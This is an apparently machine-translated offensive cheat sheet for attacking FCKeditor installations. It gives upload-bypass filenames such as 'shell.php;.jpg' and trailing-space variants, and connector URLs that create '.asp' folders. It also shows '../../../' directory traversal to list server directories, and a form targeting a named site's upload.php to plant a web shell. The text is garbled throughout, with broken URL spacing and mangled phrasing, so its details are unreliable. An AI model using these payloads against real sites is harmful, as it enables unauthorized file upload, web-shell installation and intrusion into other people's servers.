1. View Editor version

FCKeditor / _whatsnew.html
——————————–
2. Version 2.2 release
Apache linux environment, followed by one in the uploaded file. Breakthrough test.
3.Version <= 2.4.2 For php PHP Upload a place in dealing with Media types did not
Upload file type of control, causing users to upload any file
Saved as a html file the following address change action
[Url =] Copy the contents to the clipboard [/ url] code
action = "http://www.wfda.net/admin/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method = "post">

4.FCKeditor file upload “.” Variable “_” underscore the bypass method
Very often, for example, the uploaded file: shell.php.rar or shell.php;. Jpg will become
shell_php;. jpg This is a new version of FCK change.
4.1: Submit shell.php space around
Space systems only support win, but * nix is not supported [shell.php and shell.php space is
Two different files are not tested. ]
4.2: Continue to upload the file the same name can be changed to shell.php; (1). Jpg can also create a new folder
Detect only the first level directory, if the jump to the secondary directory is not restricted.
5. Breakthrough build folder
[Url =] Copy the contents to the clipboard [/ url] code
FCKeditor / editor / filemanager / connectors / asp / connector.asp? Command
= CreateFolder & Type = Image & CurrentFolder = / shell.asp & NewFolderName
= Z & uuid = 1244789975684

FCKeditor / editor / filemanager / browser / default / connectors / php / conne
ctor.php? Command = CreateFolder & CurrentFolder = / & Type = Image & NewFolde
rName = aa.asp

http://www.wfda.net/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php

6. FCKeditor address in the file upload test
[Url =] Copy the contents to the clipboard [/ url] code
FCKeditor / editor / filemanager / browser / default / connectors / test.html
FCKeditor / editor / filemanager / upload / test.html
FCKeditor / editor / filemanager / connectors / test.html
FCKeditor / editor / filemanager / connectors / uploadtest.html

————————————————– ————————————————-
7. Common Upload Address
[Url =] Copy the contents to the clipboard [/ url] code
FCKeditor / editor / filemanager / browser / default / connectors / asp / conne
ctor.asp? Command = GetFoldersAndFiles & Type = Image & CurrentFolder = /
FCKeditor / editor / filemanager / browser / default / browser.html? Type = Im
age & connector = connectors / asp / connector.asp
FCKeditor / editor / filemanager / browser / default / browser.html? Type = Im
age & Connector = http://www.site.com/fckeditor/editor/filemanag
er / connectors / php / connector.php (ver: 2.6.3 test)
JSP version:
FCKeditor / editor / filemanager / browser / default / browser.html? Type = Im
age & Connector = connectors / jsp / connector

Note the red part of the actual use of FCKeditor to modify the scripting language, you can customize the text blue
Folder name can also be used ../.. directory traversal, purple part is the actual website address.
————————————————– ————————————————
8. Other By Address
FCKeditor / _samples / default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
Many sites have been deleted _samples general directory, you can try.
FCKeditor / editor / fckeditor.html can not upload a file, click the Upload Picture button again
Choose to view the server can upload files to jump to the page actually 7. Common upload address.
————————————————– ————————————————
9. Out directory can also help to find upload vulnerability address
Version 2.4.1 tested
Modify CurrentFolder parameters used to access different directory ../../
/ Browser / default / connectors / aspx / connector.aspx? Command = CreateFolder
& Type = Image & CurrentFolder =../../../& NewFolderName = aspx.asp
According to the returned XML information can view the site all the directories.
FCKeditor / editor / filemanager / browser / default / connectors / php / connector.php? Co
mmand = GetFoldersAndFiles & Type = Image & CurrentFolder = /
You can also browse letter:
JSP version:
FCKeditor / editor / filemanager / browser / default / connectors / jsp / connector? Command
= GetFoldersAndFiles & Type = & CurrentFolder = /
10. Explosive path vulnerability
FCKeditor / editor / filemanager / browser / default / connectors / php / connector.php? Co
mmand = GetFoldersAndFiles & Type = File & CurrentFolder = / 1.asp

/ Browser / default / connectors / php / connector.php? Command = CreateFolder & Type = Image & CurrentFolder =../../../& NewFolderName = test.asp

11. FCKeditor passive restriction policy problem caused by strict filter
Of versions: FCKeditor x.x <= FCKeditor v2.4.3
Vulnerability Description:
FCKeditor v2.4.3 in File Type Default Deny upload types:
html | htm | php | php2 | php3 | php4 | php5 | phtml | pwml | inc | asp | aspx | ascx | jsp | cfm | cfc | pl | bat |
exe | com | dll | vbs | js | reg | cgi | htaccess | asis | sh | shtml | shtm | phtm
Fckeditor 2.0 <= 2.2 allows you to upload asa, cer, php2, php4, inc, pwml, pht suffix
File
After uploading the saved file it directly with the $ sFilePath = $ sServerDir. $ SFileName, but not
Use $ sExtension suffix
Under the direct result of the win followed by uploading a file. To break through [not tested]
In apache, because “Apache file name parsing flaw vulnerability” can also use the other recommended that its
He defined TYPE variables upload vulnerability in the File class to use when uploading files, according to the FCKeditor
Code, its limitations the most restrictive.
Met in the upload script files can be uploaded directly to very good, but some versions may not be directly uploaded to
To take advantage of the file name followed by. Points or spaces around, vulnerability analysis can also be used to establish xxx.asp 2003
Folder, or upload xx.asp;. Jpg
These methods are Internet penetration in the collection and in peacetime lessons learned, there may be some omissions, as re-
Remember when to add, also has its own did not have to rely on you heroes discovered a shared learning